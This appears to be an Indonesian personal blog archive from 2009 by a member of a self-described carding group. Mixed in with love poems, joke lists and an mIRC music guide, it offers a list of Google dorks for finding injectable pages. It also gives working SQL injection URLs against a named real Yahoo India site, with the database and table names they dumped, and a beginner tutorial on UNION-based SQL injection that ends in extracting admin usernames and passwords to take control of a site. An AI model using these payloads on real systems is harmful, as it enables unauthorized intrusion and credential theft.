Desember 24, 2009 /
Pelaku Cyber Crime Kartu Kredit Bank Asing Dibekuk
Metro Malam / Hukum & Kriminal / Rabu, 23 Desember 2009 00:11 WIB
Metrotvnews.com, Jakarta: Direktorat Kriminal Khusus Kepolisian Daerah (Ditkrimsus Polda) Metro Jaya meringkus dua tersangka cyber crime. Kedua tersangka membobol kartu kredit secara online produk bank asal Amerika Serikat yang dipakai untuk membeli tiket pesawat.
Menurut Kepala Satuan Cyber Crime Ditkrimsus Polda Metro Jaya Ajun Komisaris Besar Polisi Winston Tommy Watuliu dalam keterangan persnya, Selasa (22/12), tiket pesawat maskapai Air Asia yang dibeli kemudian dijual pelaku dengan harga murah melalui sistem online. Pelaku biasa menerobos sistem perbankan bank asing, seperti Capital One UA, Cash Bank USA dan GT Morgan Bank USA.
Pelaku bernama Adi dan Ari. Keduanya ditangkap polisi di Jakarta dan Malang. Adi dan Ari mengaku belajar membobol sistem keamanan perbankan asing dengan cara otodidak. Dari kedua tersangka, polisi menyita sejumlah barang bukti, antara lain laptop, telepon selular dan buku tabungan.(BEY/Fahirmal Fahim)
http://www.metrotvnews.com/index.php/metromain/newsvideo/2009/12/23/96450/Pelaku-Cyber-Crime-Kartu-Kredit-Bank-Asing-Dibekuk
Desember 22, 2009 /
Dork
Sedikit berbagi ajj deh ke kawan2 ni ane ada sedikit koleksi dork,
sebagian gw dapet dari si oneal ^_^
dan kemaren juga gw bisa dapet bugs di Indian Yahoo dari dork ini "inurl:article.php?ID="
Nah ini koleksi Dork yang lain'a :
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
/
Hatimu bagaikan sebuah system
Hatimu bagaikan sebuah system...
Disaat kemarin kamu menangis dan kecewa karena atas semua sikap dan salah aku yg aku perbuat ke kamu.
Kenapa disaat aku coba scan kamu untuk mengetahui port mana yang terbuka tetapi kenapa tidak ada lagi port itu yang terbuka untuk aku disaat aku ingin c:\> nc -m -a -a -f ke hatimu ?
Hatimu bagaikan sebuah system...
Disaat aku mencari vulnerabilitiesmu Kenapa tidak ada lagi vulnerabilities itu di hatimu ?
Disaat aku ingin inject dengan menggunakan PHP injection untuk meminta maaf ke kamu.
Saat aku ls -la; find / -perm 777 -type d, dan juga mengapa tidak ada lagi folder yang bisa ditulisi dan tidak ada lagi free space buat aku ?
Hatimu bagaikan sebuah system...
Apakah service-mu sudah crash untuk aku ? dan telah ada orang lain yg telah menjadi firewall barumu ?
Dan masuk ke hatimu memasang portsentry baru, dan menyeting error pagemu "The page cannot be found Coz Has Been Owned by Someone get out!"
Hatimu bagaikan sebuah system...
Mengapa ada kata "You dont have permission to access it" untuk aku sekarang ini ?
Disaat aku ingin mencoba mengulang kembali dan menyesali perbuatanku.
apakah hatimu sudah tertutup untuk aku ?
Disaat aku sudah mulai putus asa ketika aku ingin ping flood Atau DDos Attack hatimu aku teringat kembali.
Karena aku yang salah selama ini selalu mengecewakanmu.
Tetapi tidak ada kah lagi folder di hatimu yg bisa aku tulisi kata MAAF untuk aku ?
Atau kah kamu sudah rm -rf folder ak di hatimu ?
Jika memang kamu sudah rm -rf folder aku di hatimu.
Mungkin aku aku akan menjadi seorang pecundang yang hanya berani ping di belakang anonymouse proxy
Dan jika memang sudah ada administrator baru di hatimu.
Jujurlah kepada aku tinggalkan lah aku dengan senyumanmu supaya aku tidak merana seperti ini.
Jika kamu memang mencitai dia aku akan coba mengerti mungkin aku memang bukan cinta sejati untuk hidupmu yang sering membuat kamu menitihkan air mata seperti itu.
/
Seseorang Yg Mencintaimu Dengan Tulus
1. Orang yang mencintai kamu tidak pernah bisa memberikan alasan kenapa ia mencintai kamu, yang ia tahu dimatanya hanya ada kamu satu²nya.
2. Orang yang mencintai kamu selalu menerima kamu apa adanya,dimatanya kamu selalu yang tercantik/tertampan walaupun mungkin kamu merasa berat badan kamu sudah berlebihan atau kamu merasa kegemukan .
3. Orang yang mencintai kamu selau ingin tau tentang apa saja yang kamu lalui sepanjang hari ini, ia ingin tau kegiatan kamu.
4. Orang yang mencintai kamu akan mengirimkan sms seperti "slmt pagi" "slmt hr mggu" "slmt tidur", walaupun kamu tidak membalas pesannya.
5. Kalau kamu berulang tahun dan kamu tidak mengundangnya setidaknya ia akan telpon untuk mengucapkan selamat atau mengirim sms.
6. Orang yang mencintai kamu akan selalu mengingat setiap kejadian yang ia lalui bersama kamu, bahkan mungkin kejadian yang kamu sendiri sudah lupa setiap detailnya, karena saat itu adalah sesuatu yang berharga untuknya.
7. Orang yang mencintai kamu selalu mengingat tiap kata2 yang kamu ucapkan bahkan mungkin kata2 yang kamu sendiri lupa pernah mengatakannya.
8. Orang yang mencintai kamu akan belajar menyukai lagu-lagu kesukaanmu, bahkan mungkin meminjam CD/kaset kamu,karena ia ingin tau kesukaanmu, kesukaanmu kesukaannya juga.
9. Kalau terakhir kali ketemu, kamu sedang sakit flu, terkilir, atau sakit gigi, beberapa hari kemudian ia akan mengirim sms atau menelponmu dan menanyakan keadaanmu.. karena ia mengkhawatirkanmu.
10.Kalau kamu bilang akan menghadapi ujian ia akan menanyakan kapan ujian itu dan saat harinya tiba ia akan mengirimkan sms "good luck" atau menelponmu untuk menyemangati kamu.
11.Orang yang mencintai kamu akan memberikan suatu barang miliknya yang mungkin buat kamu itu ialah sesuatu yang biasa, tapi itu ialah suatu barang yang istimewa buat dia.
12.Orang yang mencintai kamu akan terdiam sesaat,saat sedang berbicara ditelpon dengan kamu, sehingga kamu menjadi binggung saat itu dia merasa sangat gugup karena kamu telah mengguncang dunianya.
13.Orang yang mencintai kamu selalu ingin berada didekatmu dan ingin menghabiskan hari2nya denganmu.
14.Jika suatu saat kamu harus pindah ke kota lain untuk waktu yang lain ia akan memberikan nasehat supaya kamu waspada dengan lingkungan yang bisa membawa pengaruh buruk bagimu.
15.Orang yang mencintai kamu bertindak lebih seperti saudara daripada seperti seorang kekasih.
16.Orang yang mencintai kamu sering melakukan hal2 yang konyol spt menelponmu 100x dalam sehari, atau membangunkanmu ditengah malam karena ia mengirim sms atau menelponmu. karena saat itu ia sedang memikirkan kamu.
17.Orang yang mencintai kamu kadang merindukanmu dan melakukan hal2 yang membuat kamu jengkel atau gila, saat kamu bilang tindakannya membuatmu terganggu ia akan minta maaf dan tak kan melakukannya lg
18.Jika kamu memintanya untuk mengajarimu sesuatu maka ia akan mengajarimu dengan sabar walaupun kamu mungkin orang yang terbodoh di dunia!
19.Kalau kamu melihat handphone-nya maka namamu akan menghiasi sbgn besar "INBOX"nya.Ya ia masih menyimpan pesan dari kamu walaupun pesan itu sudah kamu kirim sejak berbulan2 bahkan bertahun2 yang lalu.
20.Dan jika kamu menghindarinya atau memberi reaksi penolakan, ia akan menyadarinya dan menghilang dari kehidupanmu walaupun hal itu membunuh hatinya. Karena yang ia inginkan hanyalah kebahagiaanmu.
21.Jika suatu saat kamu merindukannya dan ingin memberinya kesempatan ia akan ada disana menunggumu karena ia tak pernah mencari orang lain. Ya............ia selalu menunggumu
/
Bugs On Indian !yahoo
*************************************************************************
--==[ Author ]==--
[+] Author : z0mb13
[+] Contact : z0mb13[dot]666[at]gmail[dot]com
[+] Blog : http://z0mb13.do.am/
[+] Group : YOGYACARDERLINK
[+] Site : http://yogyacarderlink.web.id/
[+] Date : Desember, 11-2009 [INDONESIA]
*************************************************************************
[+]Priview : http://i45.tinypic.com/34i3a0j.jpg
[+]http://in.jagran.yahoo.com/
[+]http://in.jagran.yahoo.com/sahitya/article/index.php?category1&articleid=-2243
[+]http://in.jagran.yahoo.com/sahitya/article/index.php?category1&articleid=-2243+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1
4--
[+]http://in.jagran.yahoo.com/sahitya/article/index.php?category1&articleid=-2243+union+select+1,2,3,4,5,unhex(hex(group_conca
t(schema_name))),7,8,9,10,11,12,13,14+from+information_schema.schemata--
[+]http://in.jagran.yahoo.com/sahitya/article/index.php?category1&articleid=-2243+union+select+1,2,3,4,5,unhex(hex(group_conca
t(table_name))),7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=0x444a--
[+]http://in.jagran.yahoo.com/sahitya/article/index.php?category1&articleid=-2243+union+select+1,2,3,4,5,unhex(hex(group_conca
t(column_name))),7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x617274697374--
databases:
[+] Number of Databases: 25
[0] DJ
[1] DJ_Budget
[2] DJ_Cricket
[3] DJ_Dharm
[4] DJ_Election2008
[5] DJ_Election2009
[6] DJ_Epaper
[7] DJ_FeedProcessStatus
[8] DJ_Feedback
[9] DJ_Gudgudee
[10] DJ_Home
[11] DJ_IPL
[12] DJ_Josh
[13] DJ_Junior
[14] DJ_Khanakhazana
[15] DJ_Olympics
[16] DJ_Poll
[17] DJ_Pravasi
[18] DJ_RashiPhal
[19] DJ_Results
[20] DJ_Sahitya
[21] DJ_Sakhi
[22] feed_stats
[23] jagran_jagran
[24] test
[25] jagran_jagran
table_name of DJ:
article_has_photo,artist,artist_has_data,artist_has_movies,artist_has_photos,banner,
breakingnews,business,business_Jan072009,category,city,city_bkpup_14_July2008,
dead_article_local,editorial,editorial_Jan_072009,entertainment,
entertainment_jan_072009,exchange,features,features_07Jan2009,homepage,
homepage_07Apr2008,homepage_jan_072009,infotainment,innews,international,
international_Jan072009,latest_local,local,local_011999,local_012008,
local_012008_bkp,local_012009,local_022008,local_022008_bkp,local_022009,
local_032008,local_032008_bkp,local_042008,local_042008_bkp,local_052008,
local_052008_bkp,local_062007,local_062007_bkp,local_062008,local_072007,
local_072007_bkp,local_072008,local_082007,local_082007_bkp,local_082008,
local_092007,local_092007_bkp,local_092008,local_102007,local_102007_bkp,
local_102008,local_112007,local_112007_bkp,local_112008,local_122007,
local_122007_bkp,local_122008,local_Jan072009,local_archivalTables,
local_b4_archival,local_backup,local_latest,local_latest_02052008,
local_latest_jan_0
column_name of artist :
artist_name,birthdate,img_url,bio_article_id,artist_id
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Big Thanks => Yogyacarderlink & Indonesian Hacker
Yogyacarderlink => v3n0m,leqhi,lingah,eidelweiss,IdioT_InsidE,Jali-,g0nz,aRiee,setanmuda,
=> ghopar_santiago,komenk,^ones^,d4rk_kn19ht,yoga0400,m4rco,dewancc,bocah|dudul
=> devilz_blue,jo8928,L4zyb0i,craxboy90,r1pp3r_m4y4,mywisdom
========================================================================================================
Indonesian Hacker => aa,bobyhikaru,byz,mogsawnewbie,oneal,gr33nc0d3,ELV1N4,vyc0d,penyoet,cs-31,N4ck0,MR.FRIBO
=> th3_b4n7it,bom2stalker,dexter,james0baster,flyff666,kiddies,gonzhack,Ichito_Bandito
========================================================================================================
Others => g0par Santiago,Don Tukulesto,yadoy666
=> badkiddies,broken_hack,M364TR0N
=> zee_eichel,oche_aneh,v4lc0m87 & ALL MOSLEM HACKERS
========================================================================================================
Big Thanks => Bunda saya (karena saya nemuin bugs ini tepat di hari ibu)
=> Ditha (kamu inspirasi terbesar ak)
=> v3n0m (yang selalu sabar ngajarin gue dari awal sampe sekarang ini)
=> aRiee (yang banyak ngajarin gw di jaringan walaupun gw kagak pernah ngerti wkwk)
=> leQhi (yang bikin gw jadi semangat belajar)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/
21 Alasan untuk tetap merokok
Ini dia 21 alasan kenapa gw tetap merokok dan membela perokok
- Kata para ahli, Perokok pasif lebih berbahaya daripada perokok aktif, maka untuk mengurangi resiko tersebut, aktiflah merokok.
- Menghindarkan dari perbuatan jahat karena tidak pernah ditemui orang yang membunuh, mencuri dan berkelahi sambil merokok.
- Mengurangi resiko kematian: Dalam berita tidak pernah ditemui orang yang meninggal dalam posisi merokok.
- Berbuat amal kebaikan: Kalau ada orang yang mau pinjam korek api paling tidak sudah siap / tidak mengecewakan orang yang ingin minjem.
- Baik untuk basa-basi / keakraban: Kalau ketemu orang misalnya di Halte kita bisa tawarkan rokok. Kalau basa-basinya nawarin uang kan ga lucu.. apalagi kalo nawarin cewe :-p
- Memberikan lapangan kerja bagi buruh rokok, dokter, pedagang asongan dan perusahaan obat batuk.
- Bisa untuk alasan untuk tambah gaji karena ada uang tambahan untuk rokok.
- Bisa menambah suasana pedesaan / nature bagi ruangan ber AC dengan asapnya, sehingga se-olah² berkabut.
- Menghilangkan bau wangi ruangan bagi yang alergi bau parfum.
- Kalau mobil mogok karena busi ngadat tidak ada api, maka sudah siap api.
- Membantu program KB dan mengurangi penyelewengan karena konon katanya merokok bisa menyebabkan impotensi.
- Melatih kesabaran dan menambah semangat pantang menyerah karena bagi pemula merokok itu tidak mudah, batuk dan tersedak tapi tetap diteruskan (bagi yang lulus).
- Untuk indikator kesehatan: Biasa'a orang yang sakit pasti dilarang dulu merokok. Jadi yang merokok itu pasti orang sehat.
- Menambah kenikmatan: Sore hari minum kopi dan makan pisang goreng sungguh nikmat. Apalagi ditambah merokok, ya ga beh .. (hobinye babeh ney...)
- Tanda kalau hari sudah pagi, kita pasti mendengar ayam merokok.
- Anti maling, waktu perokok batuk berat di malam hari si maling jadi takut untuk beroperasi.
- Teman boker (poop) yang setia. Iya ga ? Coba lo ajak temen atau pacar lo, mau ga dia ?
- Bahan inspirasi dan pendukung membuat Tugas Akhir, seharus'a dicantumkan terima kasih untuk rokok pada kata sambutan..
"Terimakasih atas bimbingan dari pak Herman dan pak Tedi... Special thanks untuk Dji Sam Soe.. karena telah menemani dengan kesetiaan melebihi apapun dalam penyusunan Proyek Akhir ini "... - Film Koboy pasti lebih gaya kalau merokok sambil naik kuda, soalnya kalau sambil ngupil susah banget.
- Membantu shooting film kejam, rokok digunakan penjahat buat nyundut jagoan yang terikat dikursi.
- Membuat Film lebih cool, soal'a kalo meledakan mobil atau pom bensin butuh rokok yang disentil ke bensin yang tercecer, BOOOOOMMMMM !!!.
/
Download Lagu Via Mirc
Mungkin tutorial basi tapi lumayan lah buat nambah² pengetahuan buat yg baru tau, ini cuma sekedar alternative cari mp3 selain menggunakan software p2p kya limewire, shareaza etc.
berikut langkah dan bahan yg perlu di siapkan:
1. Download Mirc dolo klo blom punya Download dulu.
2. Roko Mild sebungkus plus cemilan'a biar ga bete
3. Siapin Music Player kya winamp, jet audio
Sebelom pertempuran di mulai (gileee benerrrr) sebaik'a gw kasih tau dolo ney 3 server utama untuk download lagu di mirc ini, diantara'a:
1. Nama server: NullusNet, /s irc.nullus.net
*Channel: indomp3, /j indomp3
2. Nama server: PhaZeNet, /s irc.phazenet.com
*Channel: mp3albums, /j mp3albums
3. Nama server: TheOneServ, /s irc.theoneserv.net
*Channel: theone, /j theone
terserah lo mo masuk server yg mana atau masuk sekaligus pada tiga server itupun ga masalah, tapi buat server TheOneServ kita di harusin buat registrasi nick dolo di sana, jadi mendingan lo registrasi aja, lagian gratis ko tanpa di pungut bayaran, nah sekarang gw kasih tau ney langkah²a
1. Buka mirc
2. Setting mirc lo di tools -> option -> sounds -> requests, nah centang aja kotak pada pilihan Accept sound requests, trus pada pilihan Sound folders pilih Mp3(*.mp3), klo udah langsung aja klik 0.k
3. ketik /s irc.theoneserv.net or server pilihan lo (liat pada pilihan server di atas)
4. Begitu connected server silakan pilih channel sesuai pada chan di atas mengikuti server'a masing²
nah kan udah masuk ke channel tuch, sekarang command atau perintah buat cari lagi and download lagu'a kya gini ney:
*Untuk cari lagu silakan ketik @find (lagu yg di cari)
contoh: @find christina aguilera
*Nah ntar ada beberapa bot yg pv lo, trus ngasih info ke lo
contoh: !A01_K4iz3 Christina Aguilera - Reflection.mp3 ::INFO:: 3.3MB
*Begitu udah dapet info, copy paste semua trus paste di channel, trus tungguin aja sampe lo dapet popup transfer file dan ga usah ragu langsung aja klik 0.k dan accept file lagu yg siap di transfer, o iya untuk directory default file yg di kirim bakal ke simpen di directory C:\Program Files\mIRC\sounds\nama file lagu.mp3
Saran terakhir gw jangan pake nick yg aneh² kya z0mb13^^keren karena emang jangan sampe ada yg tau klo gw tuch terlalu keren, heheheh, canda boss, maksud gw klo lo pake nick dengan karakter² aneh, takut ga bisa join ke server, c'z server'a kurang mengenal karakter² yg kya gitu mungkin (lagian sapa suruh ga kenalan !!)
s0... Have fun and enjoy your days with your favourite music !!
/
SQLi For Newbie
Pengertian sql injection:
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
[+]step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
[+]step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
[+]step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
[+]step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
===========
[+]step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
[+] step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.piclist.com/techref/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
[+] step Delapan:=
==============
tahap terakhir mencari halam admin atau login
selanjutnya terserah anda karena kekuasaan web ada di tangan lo...


